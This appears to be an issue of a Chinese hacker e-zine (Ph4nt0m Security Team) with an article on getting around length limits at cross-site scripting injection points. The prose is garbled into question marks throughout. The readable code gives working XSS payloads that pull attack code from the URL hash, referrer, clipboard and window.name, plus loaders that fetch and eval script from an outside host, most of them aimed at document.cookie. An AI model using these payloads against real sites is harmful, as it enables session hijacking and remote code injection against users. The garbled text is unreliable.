==Ph4nt0m Security Team==
Issue 0x03, Phile #0x04 of 0x07
|=---------------------------------------------------------------------------=|
|=-------------------=[ ???XSS??????????????????JS???? ]=-----------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=------------------------=[ By luoluo ]=---------------------------=|
|=----------------------=[ <luoluo#ph4nt0m.org> ]=------------------------=|
|=----------------------=[ <luoluo#80sec.com> ]=------------------------=|
|=---------------------------------------------------------------------------=|
[??]
1. ????
2. ??????
2.1 ????HTML????????????????????????
2.2 ????URL?е?????
2.3 JS???????????
2.4 ???????????????????????????????
2.4.1 document.referrer
2.4.2 ???а?clipboardData
2.4.3 ??????window.name
2.5 ?????????????
3. ???
4. ?ο?
???????
??ЩXSS??????????????????????????Ч???????????????????????YY????????
?????????????????????????????Ч??????????????Ч?????????????????????
??????JS?????????????????о??????????XSS?????????????????????????????
???????????????????????????????????????????????????????????????????Щ
????????μ?XSS?????
????????к?????????????????????????????????п?????????????????
???
??????????
2.1 ????HTML????????????????????????
???????XSS????????HTML????????????????????????????????????JS??????
?????eval????document.write/innerHTML??????и??????????????XSS?????????
??????????????????div????????????????????????????????HTML???????
--code-------------------------------------------------------------------------
<div id="x">????????????</div>
<limited_xss_point>alert(/xss/);</limited_xss_point>
-------------------------------------------------------------------------------
????XSS?????????????????????????????????????????XSS??Payload???escape
?????????????????????????????????λ????????XSS????п??????????
--code-------------------------------------------------------------------------
<div id="x">alert%28document.cookie%29%3B</div>
<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 28 + len(id)
????x????????????????????????????????????????????JS??????
2.2 ????URL?е?????
????????????????????????HTML?????????????????Щ??????????????????
????????????????URL???????URL??β?????????????е?????????XSS?????
document.URL/location.href????????????????У?????????????80??????????
???
--code-------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)
<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 30
--code-------------------------------------------------------------------------
<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 31
??????????????????????????????????а???????????????JavaScript???
??String??????????????и???????????????????slice??5???????substr????????
?????
--code-------------------------------------------------------------------------
<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 29
--code-------------------------------------------------------------------------
<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 30
?????????а????????????YES?????????MSND???location?????ο??????
?и?hash????????#???????????????????????е???????#???棬??????hash??
???????У??????????????#??????????????slice??????????????????
--code-------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1....#alert(document.cookie)
<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 29
????????????????????????????????????????????
2.3 JS???????????
??????????????????JS??DHTML??????????????????????????Щ????????????
String.fromCharCode
getElementById
getElementsByTagName
document.write
XMLHttpRequest
...
??????????????????д??Σ????????????????????????????????????
?????????????????????
--code-------------------------------------------------------------------------
function $(id) {
    return document.getElementById(id);
}
-------------------------------------------------------------------------------
??Щ??????????????????????????????????Payload????????????????????????
?????IE??FF???????????ID???????????????Щ???????????????????????????
--code-------------------------------------------------------------------------
function loads(url) {
    ...
    document.body.appendChild(script);
}
<limited_xss_point>loads("http://xxx.com/x");</limited_xss_point>
-------------------------------------------------------------------------------
Length: len(function name) + len(url) + 5
??????url???????????????Щ???????????????HTTP????
--code-------------------------------------------------------------------------
function get(url) {
    ...
    return x.responseText;
}
<limited_xss_point>eval(get("http://xxx.com/x"));</limited_xss_point>
-------------------------------------------------------------------------------
Length: len(function name) + len(url) + 11
???????????Щ???е?JS?????????????????????????????????????磺
JQuery
YUI
...
????????????????????????JS?????????е?????????????????????????????
??????????????????????????????
2.4 ???????????????????????????????
?????????????????????????????????????????????????????????????
???????????????????Щ??????????洫?????????XSS???????????С?
2.4.1 document.referrer
?????????????????????????????????XSS??棬??????????????url?????
Payload????XSS????????referrer???????????С?
?????????????棺
--code-------------------------------------------------------------------------
http://www.a.com/attack.html?...&alert(document.cookie)
<a href="http://www.xssedsite.com/xssed.php">go</a>
-------------------------------------------------------------------------------
??XSS????棺
--code-------------------------------------------------------------------------
<limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 34
????????????????Щ??????????location.href????<meta http-equiv=refresh>
??????????????IE??????????ò???referrer????FF??????QZ??????????????
?????????????£????????FF/IE???????????referrer??
--code-------------------------------------------------------------------------
<script type="text/javascript">
<!--
window.onload = function(){
    var f = document.createElement("form");
    f.setAttribute("method", "get");
    f.setAttribute("action", "http://www.xssedsite.com/xssed.php");
    document.body.appendChild(f);
    f.submit();
};
//-->
</script>
-------------------------------------------------------------------------------
2.4.2 ???а?clipboardData
??????????????????????clipboardData??Payloadд????а壬??????XSS????
?????и??????
????????????棺
--code-------------------------------------------------------------------------
<script>
clipboardData.setData("text", "alert(document.cookie)");
</script>
-------------------------------------------------------------------------------
??XSS????棺
--code-------------------------------------------------------------------------
<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
-------------------------------------------------------------------------------
Length: 36
?????????????IE??У???????IE 7??????汾??????????а???????
2.4.3 ??????window.name
?????????????????????????о????????????????????????????????????
????????????????????????????
???????о???window.open????????????????????????????????????????????
???????????????target?????????????????????μ???????????????????name????
???????window.open?????????????window.name?????????window?????????????
???name????????????????????????????window.open?????????????????????????
???飬?????????????????????????????????????????????????????д??JS
????VBS??
????????????????????????window.name??????????????name????????????
??????????????????XSS????棬???name???????Payload?????У?
????????????棺
--code-------------------------------------------------------------------------
<script>
window.name = "alert(document.cookie)";
location.href = "http://www.xssedsite.com/xssed.php";
</script>
-------------------------------------------------------------------------------
??XSS????棺
--code-------------------------------------------------------------------------
<limited_xss_point>eval(name);</limited_xss_point>
-------------------------------------------------------------------------------
Length: 11
?????????????????????????????????IE/FF????????????????????????
????????????????????????????????
window.name??????????????Щ???????÷????????????????????????д???
????????
2.5 ?????????????
?????????????????????????ó?????????????????????Щ???????????
?У?????????????????????????Ч??
???????
JS????????????????????????Щ???????????????????о??У??????ú???
??????????JS???????????????????????????????????????????????????????
?????????
??лaxis*??*???*???硢rayh4c*QZ*??????????????????????
????????????????????????????????
????ο?
http://msdn.microsoft.com/en-us/library/aa155073.aspx
-EOF-